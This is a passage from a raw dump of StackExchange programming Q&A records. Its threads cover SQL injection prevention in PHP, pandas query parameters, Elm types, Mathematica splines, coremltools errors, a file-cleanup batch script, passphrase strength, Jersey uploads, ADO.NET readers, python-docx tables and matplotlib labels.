very powerful way of making sure the query remains secure!\n<code>$playerid = $_GET['ID'];\nif (!is_numeric($playerid)) { die(); }\n$playerid = mysql_real_escape_string($playerid); \/\/ Just in case\n<\/code>\nThis code basically makes sure that the ID entered in the URL is numeric, or else it will stop executing the script. If it is numeric, then it will carry on retrieving the data and there is no way of doing any SQL injections.\nHope that helped! :)\nAlso, you might want to change your query to this\n<code>$result = mysql_query(\"SELECT * FROM tblPlayers WHERE lng_RecordID_PK = '\".$playerid.\"' \");\n<\/code>\nComment: (+1) for thinking outside the box. I'd do a traditional real escape too, though. It doesn't hurt to be extra safe. Who knows what character-encoding hacks it'll prevent.\nComment: Thanks :) and actually, I usually do that too. Added it to my answer\nComment: @FakeRainBrigand it is worth to mention that with the original code a \"traditional real escape\" will do no good. While in this answer it is properly used, combined with quotes.\n","meta":{"source":"stackoverflow","title":"how to avoid mysql injection when referencing the web url","dup_signals":{}},"subset":"stackexchange"} +{"text":"DatabaseError: The first argument to execute must be a string or unicode query in python\n\nQuestion: I am trying to return a date selected from date picker in to my sql query in my python code. I also tried using <code>encode(utf-8)<\/code> to remove the unicode string but still, I am getting the error. \nI am new to python. Can anyone please help me figure out how to solve this problem? I am using python flask to create the webpage\n<code>if request.method=='POST':\n dateval2 = request.form['datepick']\n dateval = dateval2.encode('utf-8')\n result = (\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\",dateval\n df = pd.read_sql_query(result,connection)`\n<\/code>\nError:\n<code>pandas.io.sql.DatabaseError\nDatabaseError: Execution failed on sql '(\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\", '2015-06-01')': The first argument to execute must be a string or unicode query.\n<\/code>\nComment: In which format comes the date from the date picker?\nComment: Format : \"yy-mm-dd\" same as my sql server database format\nComment: This is the exact error i am getting : pandas.io.sql.DatabaseError\nDatabaseError: Execution failed on sql '(\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\", '2015-06-02')': The first argument to execute must be a string or unicode query.\nComment: You are providing a tuple to [`read_sql_query`](http:\/\/pandas.pydata.org\/pandas-docs\/stable\/generated\/pandas.read_sql_query.html), while the first argument (the query) has to be a string\nAnswer: You are providing a tuple to <code>read_sql_query<\/code>, while the first argument (the query) has to be a string. That's why it gives the error \"The first argument to execute must be a string or unicode query\". \nYou can pass the parameter like this:\n<code>result = \"SELECT * FROM OE_TAT where convert(date,Time_IST)=?\"\ndf = pd.read_sql_query(result, connection, params=(dateval,))\n<\/code>\nNote that the use of <code>?<\/code> depends on the driver you are using (there are different ways to specify parameters, see https:\/\/www.python.org\/dev\/peps\/pep-0249\/#paramstyle). It is possible you will have to use <code>%s<\/code> instead of <code>?<\/code>.\nYou could also format the string in beforehand, like <code>result = \"SELECT * FROM OE_TAT where convert(date,Time_IST)={0}\".format(dateval)<\/code>, however, this is not recommended, see eg here\n","meta":{"source":"stackoverflow","title":"DatabaseError: The first argument to execute must be a string or unicode query in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to communicate with a polymorphic child component in Elm?\n\nQuestion: My main program has an <code>update<\/code> function of\n<code>update : Msg -> Model -> ( Model, Cmd Msg )\n<\/code>\nTo communicate with sub-components we can add another variant and wrap our messages in a new message\n<code>type alias Model =\n { ...\n , child : Child.Model\n }\n\ntype Msg\n = ...\n | ChildMsg Child.Msg\n\nupdate msg model =\n case msg of\n ...\n\n ChildMsg childMsg ->\n let\n ( childModel, cmd ) =\n Child.update childMsg model.child\n\n updatedModel =\n { model | child = childModel }\n\n childCmd =\n Cmd.map ChildMsg cmd\n in\n ( updatedModel, childCmd )\n<\/code>\nHowever this seem challenging if the type of my sub-component's <code>update<\/code> function does not match the parent. Consider a child with a polymorphic update function:\n<code>-- PolymorphicChild.elm\n\nupdate : Msg a -> Model -> ( Model, Cmd (Msg a) )\n<\/code>\nWhen running a command from this module, I must wrap it\n<code>PolymorphicChild.someCommand : Cmd (Msg Foo)\n\nPolymorphicChild.someCommand\n |> Cmd.map PolymorphicChild\n<\/code>\nHowever, this produces a <code>Msg (PolymorphicChild.Msg Foo)<\/code>, not the <code>Msg PolymorphicChild.Msg<\/code> my App is expecting.\n<code>The right side of (|>) is causing a type mismatch.\n\n(|>)\u00a0is\u00a0expecting\u00a0the\u00a0right\u00a0side\u00a0to\u00a0be\u00a0a:\n\n Cmd\u00a0(PolyMorphicChild.Msg\u00a0Foo)\u00a0->\u00a0a\n\nBut\u00a0the\u00a0right\u00a0side\u00a0is:\n\n Cmd\u00a0Polymorphic.Msg\u00a0->\u00a0Cmd\u00a0Msg\n<\/code>\nI tried adding a polymorphic parameter to <code>App.Msg<\/code>\n<code>-- App.elm\n\ntype Msg a =\n = ..\n | PolymorphicChildMsg (PolymorphicChild.Msg a) \n<\/code>\nBut it basically blows up my entire program. Every function involving <code>App.Msg<\/code> needs to somehow be changed to work with the new child component.\nHow can I unify the two types and get the two components working together?\nComment: This is one of those things where a lot has been made in recent months of trying to get newbies to stop thinking in \"components\", which Elm doesn't really have. Check out \"The life of a File\" https:\/\/www.youtube.com\/watch?v=XpDsk374LDE or \"Scaling Elm Apps\" https:\/\/www.youtube.com\/watch?v=DoA4Txr4GUs for a better theoretical grounding. I still make apps all the time where I have something similar to \"sub-components\", but I try to go with a flat structure for as long as possible, and then refactor when it gets too big and there are too many un-related features in the same update function.\nComment: Can you give some more insight into what you're trying to accomplish? What is the child's purpose? There may be a different approach than bubbling an undetermined type argument up the object graph.\nComment: Making an Elm front end for Wordpress \u2013 there's been some interesting challenges along the way... Here's a [link](https:\/\/ellie-app.com\/Hrqjj3knZza1) to show you what I'm talking about. I can't post all of it on Ellie because it only allows one file, but I think it's enough to get the picture. I've considered just bringing all of this into the main `App` but I was hoping to keep Wordpress backend-related stuff in an isolated module. I'm new to type-based programming so I'm probably doing something dumb...\nComment: @wmakley Thanks for sharing. I actually watched those two videos last week and refactored this module entirely based on what I learned. No more child component :D\nAnswer: I think the problem is that you're leaking too much information in your publicly exposed <code>Msg<\/code> type. Your use of the type parameter of <code>Msg a<\/code> seems limited to a known set of types, either an <code>Author<\/code>, <code>Category<\/code>, <code>Post<\/code>, or <code>Tag<\/code>. From skimming your code, it looks like it will never be anything but one of those four, so the fact that you are abstracting things in this manner should be kept inside of this module rather than exposing it and burdening any other code that may be pulling this in.\nI think you need to move the abstraction down a level to avoid parameterizing your public <code>Msg<\/code> type. I would suggest having four concrete constructors for <code>Msg<\/code> instead of parameterizing it, and shift the abstraction down to a helper <code>LoadInfo a<\/code> type:\n<code>type alias LoadInfo a =\n { worker : Worker a\n , url : Url\n , result : Result Http.Error ( Int, List a )\n }\n\ntype Msg\n = LoadPost (LoadInfo Post)\n | LoadCategory (LoadInfo Category)\n | LoadTag (LoadInfo Tag)\n | LoadAuthor (LoadInfo Author)\n<\/code>\nComment: Or even `Http.send (LoadInfo worker url) |> Cmd.map LoadPost` for those that understand it from a `Cmd.map` perspective. Functional programming is premium.\nComment: This looks much nicer, but how do I construct these messages from an Http command?\nComment: Something like `decoder |> Http.get url |> Http.toTask |> Task.attempt (LoadInfo worker url)` ?\nComment: Just shooting from the hip here, but I think this should work: `Http.send (Load << LoadInfo worker url)`\nComment: The power of this is sort of blowing my mind. I'm going to see how other areas of my program can be improved with this technique. Thanks, Chad.\n","meta":{"source":"stackoverflow","title":"How to communicate with a polymorphic child component in Elm?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to make a natural cubic spline of {{x,y}, ...} data\n\nQuestion: Consider\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nf = Interpolation[data, InterpolationOrder -> 3, Method -> \"Spline\"];\n<\/code>\nThen the second derivative is continuous and piecewise linear as expected but at the end points I get second derivative <code>f''[0] = f''[6] = -2.57143<\/code>. How does <code>Interpolation<\/code> decide on that at the end points? \nAlso, how can I get a natural cubic spline with second derivative = 0 at each end point?\nAnswer: It is interesting to compare and spot the differences between the routine in this answer and the routine given below:\n<code>naturalSpline[pts_?MatrixQ] := Module[{dy, h, sl, tr},\n h = Differences[pts[[All, 1]]]; dy = Differences[pts[[All, 2]]]\/h;\n tr = SparseArray[{Band[{2, 1}] -> Append[Rest[h], 1], \n Band[{1, 1}] -> Join[{2}, ListCorrelate[{2, 2}, h], {2}], \n Band[{1, 2}] -> Prepend[Most[h], 1]}];\n sl = LinearSolve[tr, Join[{3 dy[[1]]}, \n 3 Total[Partition[dy, 2, 1]\n Reverse[Partition[h, 2, 1], 2], {2}],\n {3 dy[[-1]]}]];\n Interpolation[MapThread[{{#1[[1]]}, #1[[2]], #2} &, {pts, sl}], \n InterpolationOrder -> 3, Method -> \"Hermite\"]]\n<\/code>\nTest on the OP's data:\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nspl = naturalSpline[data];\n\n{spl''[0], spl''[6]}\n {0, 0}\n\nPlot[spl[x], {x, 0, 6}, \n Epilog -> {Directive[AbsolutePointSize[4], ColorData[97, 4]], Point[data]}]\n<\/code>\n\nVerify $C^2$ continuity:\n<code>Plot[{spl[x], spl'[x], spl''[x]}, {x, 0, 6}, PlotRange -> All]\n<\/code>\nComment: It's also interesting to contrast this with [this previous natural spline implementation](https:\/\/mathematica.stackexchange.com\/a\/97281).\nAnswer: I augmented your data a bit to force saddle points at the ends\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nf = Interpolation[data, InterpolationOrder -> 3, Method -> \"Spline\"];\ng = Interpolation[\n Join[{(# \/\/ First) - {1, 0}}, #, {(# \/\/ Last) + {1, 0}}] &@data, \n Method -> \"Spline\", InterpolationOrder -> 3];\n<\/code>\n\nNow <code>g''[0]==g''[6]==0<\/code>\nComment: Will that give the desired result for any data?\nComment: This should be a bit more general\n`data = Sort@RandomReal[{0, 10}, {10, 2}];\ndata' = Join[{2*data[[1]] - data[[2]]}, \n data, {2*data[[-1]] - data[[-2]]}];\nf = Interpolation[data'];\nPlot[f[x], Prepend[MinMax[data[[All, 1]]], x], PlotRange -> Full]`\n","meta":{"source":"mathematica.stackexchange","title":"How to make a natural cubic spline of {{x,y}, ...} data","dup_signals":{}},"subset":"stackexchange"} +{"text":"CoreMLTools Keras simple Sequential Linear Regression model export error ('module' object has no attribute 'mobilenet')\n\nQuestion: I've created a very simple Sequential Linear Regression model using Keras 2.0.4 (TensorFlow 1.1.0 backend) and my coremltools (0.6.3) export is failing with this error message:\n--------------------------------------------------------------------------- AttributeError Traceback (most recent call last) in () ----> 1 coreml_model = coremltools.converters.keras.convert(model, input_names=\"input\", output_names=\"output\") \/Users\/Jacopo\/anaconda\/envs\/KerasTensorFlowCoreML\/lib\/python2.7\/site-packages\/coremltools\/converters\/keras\/_keras_converter.pyc in convert(model, input_names, output_names, image_input_names, is_bgr, red_bias, green_bias, blue_bias, gray_bias, image_scale, class_labels, predicted_feature_name, predicted_probabilities_output) 489 predicted_probabilities_output = predicted_probabilities_output) 490 elif _HAS_KERAS2_TF: --> 491 from . import _keras2_converter 492 return _keras2_converter._convert(model = model, 493 input_names = input_names, \/Users\/Jacopo\/anaconda\/envs\/KerasTensorFlowCoreML\/lib\/python2.7\/site-packages\/coremltools\/converters\/keras\/_keras2_converter.py in () 66 _keras.layers.wrappers.TimeDistributed:_layers2.default_skip, 67 ---> 68 _keras.applications.mobilenet.DepthwiseConv2D:_layers2.convert_convolution, 69 70 } AttributeError: 'module' object has no attribute 'mobilenet'\nI'm using Python 2.7 on macOS\nAs said this is a very simple Linear Regression and the module has no image input at all.\nAny hint ?\nThanks, Jacopo\nComment: Did you ever figure this out? I'm getting the same issue.\nComment: Yes Brad, coremltools 0.6.3 works for me with Keras 2.0.6. Even if the dependency note just says 2.0.4+ ;-)\nAnswer: Updating Keras to 2.0.6 worked for me...\nComment: Yes, thanks. Confirm that coremltools (0.6.3) works with Keras 2.0.6\nComment: For coremltools 0.7 I found that Keras 2.0.6 + Tensorflow 1.1 + h5py 2.7.1 was the magic combo. I used virtualenv as recommended by Apple on the coremltools github repo.\nAnswer: coremltools works when keras uses tensorflow, not theano, as its backend. \nyou can change keras' default backend at $HOME\/.keras\/keras.json, and changing to \"backend\": \"tensorflow\".\n","meta":{"source":"stackoverflow","title":"CoreMLTools Keras simple Sequential Linear Regression model export error ('module' object has no attribute 'mobilenet')","dup_signals":{}},"subset":"stackexchange"} +{"text":"Windows batch script to rename and delete files based on extension and time created\n\nQuestion: We have a program that take specific XML files and imports them, then changes the file from .xml to .tmp. Once it turns to .tmp we can delete the file.\nOccasionally what happens is the XML file doesn't import properly, in which case it gets renamed from .xml to .bad and the file has to be manually adjusted (could be an improper xml file or whatever). What we've discovered is that roughly 90% of the time if you rename the file back to .xml it imports fine.\nI've created a batch script to run every couple of minutes that automatically deletes the .tmp files. What I also want to do is add something to the script that renames .bad file to .xml in order to let the program try and import it again. That will cover the 90%.\nIn order to cover the last 10%, I'd like to set it up so that after about 10 minutes, it no longer tries to rename the file .bad back to .xml (based on the creation date).\nSo far, what I have is the script to delete the .tmp files:\n<code>forfiles -p \"C:\\path\\to\\xml\" -m *.tmp -c \"cmd \/c del @PATH\"\n<\/code>\nAnd I have the script to rename .bad to .xml:\n<code>forfiles -p \"C:\\path\\to\\xml\" -m *.bad -c \"cmd \/c ren *.bad *.xml\"\n<\/code>\nHow do I tell the 2nd command to do it only for files whose creation date (not last modified date) was less than 10 minutes ago?\nUpdated: \nHere's the full solution (thanks to jon Z for pointing me in the right direction):\n<code>powershell.exe -command \"get-childitem 'path\\to\\xml' -filter *.tmp | Remove-Item\"\n\npowershell.exe -command \"get-childitem 'path\\to\\xml' -filter *.bad | where-object {$_.creationtime -gt (get-date).addminutes(-8)} | foreach-object {move-item $_.fullname ($_.fullname-replace '.bad','.xml')}\"\n<\/code>\nComment: Fixing the import is not possible? Correcting the problem instead of hacking around it would be preferable I would think.\nComment: It would be if there was an automatic way to fix the imported file. Unfortunately there isn't as it could be a result of many different problems. We have to check and fix the file manually.\nAnswer: If using powershell instead of cmd is an option, you could do the following:\nto delete the files:\n<code>get-childitem c:\\path\\to\\xml -filter *.tmp | remove-item\n<\/code>\nto rename the .bad to .xml\n<code>get-childitem c:\\path\\to\\xml -filter *.bad | where-object {$_.creationtime -gt (get-date).addminutes(-10)} | foreach-object {move-item $_.fullname ($_.fullname -replace '.bad','.xml')}\n<\/code>\nAnswer: Assuming that when a file fails twice it will never succeed, then instead of just renaming the .bad files to .xml you could create a tracking file (let's call it .trk). Next time around delete all the old .trk files and any matching .bad files that are still there (since this means that the file failed twice) before tracking the remaining .bad files.\n","meta":{"source":"stackoverflow","title":"Windows batch script to rename and delete files based on extension and time created","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is better to have as password a sentence or first letter of the sentence?\n\nQuestion: Which is better master KeePass password to prevent any type of bruteforce between theses two type of password :\n\nComplete sentence invented by user like : I like cheeseburger,\ntomatoes and fries ! :) \nEach first letter of the word with lower and\nhigher case : Ilcb,tAf!:)\n\nEdit : My hesitation come from the fact that the sentence indeed is longer but, it composed of real words which could be taken from a dictionary.\nShort Answer :\nThanks to @Royce Williams, I can conclude that the best password generation method is random words with some char like :\nshoes, tomatoes ! meal computer car\nComment: Always relevant: https:\/\/www.xkcd.com\/936\/ Although a valid sentence _may_ be easier to guess than random words.\nComment: \"I like cheeseburger, tomatoes and fries\" and \"I love crustless bread, tacos and fruit\" both would be stronger passwords than \"Ilcb,Af\". (Not simply because they're longer...)\nComment: Then you have to ask yourself, \"Was cheeseburger 'c' or was it 'cb'?\" \"Did I capitalize the first letter?\" \"What other letters were capitalized?\" and \"Was there an Oxford comma?\" And in my opinion you're better off using an extra word, compared to mangling a passphrase or password with arbitrary capitalization, 1337speak, punctuation mutations, or intentional misspellings. It's not inherently more or less secure (that depends on how large a pool you draw the extra word from) but it sure makes passwords easier to remember.\nAnswer: Neither - they are usually effectively equivalent. \nThis is because:\n\npassword crackers are very aware of non-random, human-understandable passphrases - and can (and do) emulate both subtypes at high speed, and\ninjecting memorable additional sequences like \"!\" and \":)\" is just as well known and \"simulatable\", and\nthe effective entropy of either kind of passphrase-based construction technique once the methodology is known to the attacker are virtually identical.\n\nIt's #3 that is the most important lesson here, and why raw bruteforce is irrelevant: because the effective entropy of this method - how much work a real-world attacker has to perform - is dramatically less than the bruteforce entropy. This is because the psychology of naive password-memorization strategies is well-known to the attacker. \nIn your specific methodology, you only have to remember about eight things to remember the password:\n\nthe fact that you're using a passphrase at all (this is a freebie for the attacker, because they will be attacking passphrases as a class)\nthe rough meaning components of the original phrase (liking, food, and which two foods, perhaps roughly four pieces of information) (since the phrase makes grammatical sense, much of this is also easy for the attacker)\nthe fact that you did or did not use whole words vs the first letters (since there are only a few options here, this isn't hard for the attacker to exhaust both variants)\nthe placement and location of the two additional items (attackers know that people tend to put the special-character \"extra\" stuff at the end)\n\nIf the attacker had no idea at all in the history of password psychology that anyone would ever do this, you'd be in pretty good shape. But attackers know very well how people think about passwords, and what they do to \"chunk\" them into \"memorizable\" components. (In other words, your methodology does not adhere to Kerkhoffs' Principle).\nSo an attacker only has to \"bruteforce\" the psychologically likely effective entropy of your password. The attacker doesn't have to bruteforce all possible characters of length X; instead, they can dramatically reduce the things they have to guess by only trying the same possibilities that make them easier for you to remember. \nBy contrast, the most effective passphrases are random passphrases: five or six words, drawn purely randomly from a wordlist of, say, 20,000 words or more (20,000^5, or 3.2x10^21). Even if the attacker knows everything that you do about the construction methodology - exactly how many words are in the list, and exactly how many words you selected, and how you separated them, etc. - the sheer volume of possibilities is resistant to bruteforce. You only have to memorize five words - but they are so many possibilities that trying them all would take a very, very long time. If you do the math of this, you'll quickly start to understand.\n(And the concern about \"using words in the dictionary\" is a leftover from old password complexity requirements that were trying to prevent people from using single words from a dictionary. The underlying principle - avoiding \"guessability\" - is a good one, but it's totally OK to use a large number of random words that happen to be in the dictionary)\nAny password system whose strength is based solely on a large amount of randomness will always be stronger than one that isn't.\nComment: I sort of disagree with this answer, since it ignores how human beings actually behave and what they're good\/bad at. Memorizing random things is HARD. People are just terrible at it, and honestly telling people to use 5 random words is just poor advice since nobody is really going to do that. That's why many people advocate a meaningless phrase, which is far better than using a word. Or better yet, use a password manager that generates random characters and protect it with some form of two-factor.\nComment: Passphrase advice is generally confined to specific use cases - passwords that must be memorized (such as for non-web interactive (Windows) login or for password managers), passwords that need to be human-legible or human-audible, etc. For everything else, long, random, and managed by your vault is of course awesome! IMO, five random words is quite manageable for memorization, well within the lower bound of human short-term memory capacity (making rehearsal for transfer into long-term easy). The XKCD method of making up a story to match has a long history of success in memorization training.\n","meta":{"source":"security.stackexchange","title":"Is better to have as password a sentence or first letter of the sentence?","dup_signals":{}},"subset":"stackexchange"} +{"text":"REST- Jersey - Exception obtaining parameters\n\nQuestion: Here is my ajax call:\n<code>uploadExcel : function(jsonData,success, error) {\n var url = \"\/TestProject\/test\/Uploader;\n $.ajaxFileUpload({ \n url : url,\n secureuri : false,\n fileElementId : 'FileUpload',\n contentType : 'multipart\/form-data',\n dataType : 'jsonString',\n processData : false,\n type : 'POST',\n data: jsonData,\n success : success,\n error : error\n });\n}\n<\/code>\nJava Method signature:\n<code>@Path(\"\/Uploader\") \n@POST\n@Consumes('multipart\/form-data')\npublic String validateAndUpload(@FormDataParam(\"FileUpload\") byte[] inputByteArray, \n @Context HttpServletRequest request,\n @FormParam(\"jsonData\") String uploadData) {}\n<\/code>\nHere is the error I'm getting\nHere is the stackTrace:\n<code> SEVERE: Servlet.service() for servlet [ServletAdaptor] in context with path [\/TestProject] threw exception [com.sun.jersey.api.container.ContainerException: Exception obtaining parameters] with root cause\njava.lang.NullPointerException\nat com.sun.jersey.server.impl.inject.InjectableValuesProvider.getInjectableValues(InjectableValuesProvider.java:43)\nat com.sun.jersey.multipart.impl.FormDataMultiPartDispatchProvider$FormDataInjectableValuesProvider.getInjectableValues(FormDataMultiPartDispatchProvider.java:115)\nat com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$EntityParamInInvoker.getParams(AbstractResourceMethodDispatchProvider.java:126)\nat com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$TypeOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:154)\nat com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:67)\nat com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:163)\nat com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:111)\nat com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:71)\nat com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:111)\n<\/code>\nAnswer: Try:\n<code>@FormDataParam(\"FileUpload\") InputStream fileInputStream\n<\/code>\nInstead of:\n<code>@FormDataParam(\"FileUpload\") byte[] inputByteArray\n<\/code>\nAccording to <code>FormDataParam<\/code> API, the following is supported:\n<code>@POST\n@Consumes(MediaType.MULTIPART_FORM_DATA_TYPE)\npublic String postForm(\n @DefaultValue(\"true\") @FormDataParam(\"enabled\") boolean enabled,\n @FormDataParam(\"data\") FileData bean,\n @FormDataParam(\"file\") InputStream file,\n @FormDataParam(\"file\") FormDataContentDisposition fileDisposition) {\n ...\n}\n<\/code>\nFrom the javadoc:\n\nWhere the server consumes a <code>multipart\/form-data<\/code> request entity body that contains one optional named body part \"enabled\" and two required named body parts <code>data<\/code> and <code>file<\/code>.\nThe optional part <code>enabled<\/code> is processed as a <code>boolean<\/code> value, if the part is absent then the value will be true.\nThe part <code>data<\/code> is processed as a JAXB bean and contains some meta-data about the following part.\nThe part <code>file<\/code> is a file that is uploaded, this is processed as an <code>InputStream<\/code>. Additional information about the file from the <code>Content-Disposition<\/code> header can be accessed by the parameter <code>fileDisposition<\/code>.\nComment: Found the issue....i commented out `@FormParam(\"jsonData\") String uploadData` and it went through...Im going to try to see what the issue is with that\nComment: Updated my answer. Please have a look if it's useful.\n","meta":{"source":"stackoverflow","title":"REST- Jersey - Exception obtaining parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stop cutting a long text in label\n\nQuestion: In\n<code>ListLinePlot[{RandomReal[4, 6], RandomReal[2, 8], RandomReal[10, 12]},\n AxesLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \n \"Si\u00e8ges parSyndicat\"}, PlotLabels -> {\"FO\", \"SM\", \"SdM\"}]\n<\/code>\nhow can we guarantee that the Axes Label \n<code>{\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n<\/code>\nis not cut like in this example:\nAnswer: Using <code>ImagePadding<\/code>\n<code>ListLinePlot[\n {\n RandomReal[4, 6],\n RandomReal[2, 8],\n RandomReal[10, 12]\n }\n , ImagePadding -> Full\n , AxesLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n , PlotLabels -> {\"FO\", \"SM\", \"SdM\"}\n ]\n<\/code>\n\nUsing <code>FrameLabel<\/code>\n<code>ListLinePlot[\n {\n RandomReal[4, 6],\n RandomReal[2, 8],\n RandomReal[10, 12]\n }\n , Frame -> True\n , FrameLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n , PlotLabels -> {\"FO\", \"SM\", \"SdM\"}\n ]\n<\/code>\n\nYou should also see the solutions to this other question (7453) .\nHave a look into the documentation of \n\n<code>ImageMargins<\/code>\n<code>ImagePadding<\/code>\n<code>PlotRangePadding<\/code>\n\n All plots were created using Mathematica 11.1.1 On Windows 7. \nComment: for me PlotLabels doesn't work. Did you load a Package to get the Labels? I'm only familiar with PlotLabel, which is doing something different.\nComment: @RMMA `PlotLabels` was introduced in *Mathematica v 10.4*, which version do you have? I did NOT use any packages.\nComment: ok. I'm using 10.3. PlotLabels seems to be useful.\n","meta":{"source":"mathematica.stackexchange","title":"Stop cutting a long text in label","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to fire a callback once data reader reads all result\n\nQuestion: I have a class like\n<code>class ReadData{\n public IdataReader Execute(string sql){\n \/\/ Ado.net code here\n return cmd.ExecuteReader();\n }\n}\n<\/code>\nThis is the sample implementation and it works fine.\nI am calling like this in caller\n<code>class caller{\n\n void CallMethod(){\n var reader = Execute(\"Sql query here\");\n while(reader.Read()){\n logic here\n }\n \/\/Here i need to get the out params after reading the resultset.\n \/\/But the impplementation should in the class ReadData.\n \/\/because that class has implementation to get the out params for the \n \/\/other type means, execute without resultset get only output params\n }\n}\n<\/code>\nSome possible ways like calling the first method with callback and in that once the data is read completely then read the out params.\nI don't know how to implement that stuff.\nAny possible better ways to do ?\nPlease help me on this..\nAnswer: <code>public void Execute(string sql, Action<IDataRecord> action)\n{\n using(var connection = new ...)\n {\n connection.Open();\n\n using(var command = new ...)\n {\n using(var reader = command.ExecuteReader())\n {\n while(reader.Read())\n {\n action(reader);\n }\n }\n }\n }\n}\n<\/code>\nThis would allow you to do something like this:\n<code>var entries = List<object>();\n\nExecute(\"Sql query here\", row => entries.Add(row[\"Field\"]));\n<\/code>\nOr you could try a more linqy appraoch:\n<code>public IEnumerable<IDataRecord> Execute(string sql)\n{\n using(var connection = new ...)\n {\n connection.Open();\n\n using(var command = new ...)\n {\n using(var reader = command.ExecuteReader())\n {\n while(reader.Read())\n {\n yield return reader;\n }\n }\n }\n }\n}\n<\/code>\nWhich would allow something like this:\n<code>var list = Execute(\"Sql query here\").Where(row => (int)row[\"Field\"] == 17)).ToList();\n<\/code>\nHowever, this has some weird effects with defered execution if you don't materialize it properly.\nComment: u mean the second approach has got some problem or both the ways ?\nComment: The second approach is for people who know what they are doing. With the first one, it's way harder to make mistakes. Both work fine if used properly.\n","meta":{"source":"stackoverflow","title":"how to fire a callback once data reader reads all result","dup_signals":{}},"subset":"stackexchange"} +{"text":"Replace existing table in Word doc using python docx\n\nQuestion: I have a Word document with the following tables:\n<code>doc = Document('doc_generator.docx')\nprint(doc.tables)\n<\/code>\n[docx.table.Table object at 0x0000017E8B2A0D68, docx.table.Table object at 0x0000017E8B2A0198]\nand I am trying to replace one of the existing tables with a new one.\nWhat I have done is:\n<code>doc.tables[0] = new_table\n<\/code>\nwith new_table being an actual Word docx table, i.e. running:\n<code>type(new_table)\n<\/code>\nreturns:\ndocx.table.Table\nIf I then try to save the updated document via:\n<code>doc.save('Updated.docx')\n<\/code>\nThe table is still not updated. If instead I run a command as e.g. :\n<code>doc.tables[0].add_row()\n<\/code>\nThe table is actually updated in the Word doc. It seems the problem is my assignment statement. Any idea how to solve this? I do want to replace, not edit or update, an existing table with a new one via python-docx. Thanks in advance.\nAnswer: You could use the .replace method for the parent xml object:\n<code>doc.element.body.replace(old_table._element, new_table._element)\n<\/code>\nWhere both 'old_table' and 'new_table' are docx.table.Table objects. The ._element attribute accesses the table object within the doc's xml structure.\nIf doc.element.body is not the parent element of the table, you can find the parent using:\n<code>old_table._element.getparent()\n<\/code>\n","meta":{"source":"stackoverflow","title":"Replace existing table in Word doc using python docx","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sum of row and columns as x and y axis\n\nQuestion: I'm a beginner in using python and encountered a problem I hope you can help me with:\nBelow you can see an example code I have made for plotting a matrix in which the y-axis is presented on the left and the x-axis on top. What I would like is to have at the x-axis on the bottom beneath every column the sum of that column and for the y-axis on the right for every row the sum of that row. \nThis would mean that for the first row I want the number 39 as y-label and for the first column I want 39 as x-label. \nI hope someone can help me with this problem\n<code>import numpy as np\nimport matplotlib.pyplot as plt\n\nconf_arr = [[33,2,0,0,0,0,0,0,0,1,3], \n [3,31,0,0,0,0,0,0,0,0,0], \n [0,4,41,0,0,0,0,0,0,0,1], \n [0,1,0,30,0,6,0,0,0,0,1], \n [0,0,0,0,38,10,0,0,0,0,0], \n [0,0,0,3,1,39,0,0,0,0,4], \n [0,2,2,0,4,1,31,0,0,0,2],\n [0,1,0,0,0,0,0,36,0,2,0], \n [0,0,0,0,0,0,1,5,37,5,1], \n [3,0,0,0,0,0,0,0,0,39,0], \n [0,0,0,0,0,0,0,0,0,0,38]]\n\nnorm_conf = []\nfor i in conf_arr:\n a = 0\n tmp_arr = []\n a = sum(i, 0)\n for j in i:\n tmp_arr.append(float(j)\/float(a))\n norm_conf.append(tmp_arr)\n\nfig = plt.figure()\nplt.clf()\nax = fig.add_subplot(111)\nax.set_aspect(1)\nres = ax.imshow(np.array(norm_conf), cmap=plt.cm.OrRd, \n interpolation='nearest')\n\nwidth = len(conf_arr)\nheight = len(conf_arr[0])\n\nfor x in xrange(width):\n for y in xrange(height):\n ax.annotate(str(conf_arr[x][y]), xy=(y, x), \n horizontalalignment='center',\n verticalalignment='center')\n\nax.xaxis.tick_top()\ncb = fig.colorbar(res)\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nplt.ylabel('True Landform (value explanation in info)')\nplt.xticks(range(width), alphabet[:width])\nplt.yticks(range(height), alphabet[:height])\nplt.savefig('confusion_matrix.png', format='png')\nplt.show()\n<\/code>\nAnswer: You can sum row #i using this command:\n<code>sum(conf_arr[i])\n<\/code>\nRemember, in python counting starts from 0 (and not 1 like Matlab).\nTo invert the matrix, you can use \n<code>zip(*conf_arr)\n<\/code>\nAnd then you may sum row #i (which would be in fact column #i).\nComment: I do understand now how to get the sum of each row, but how do I plot those values in a plot of the confusion matrix??\n","meta":{"source":"stackoverflow","title":"Sum of row and 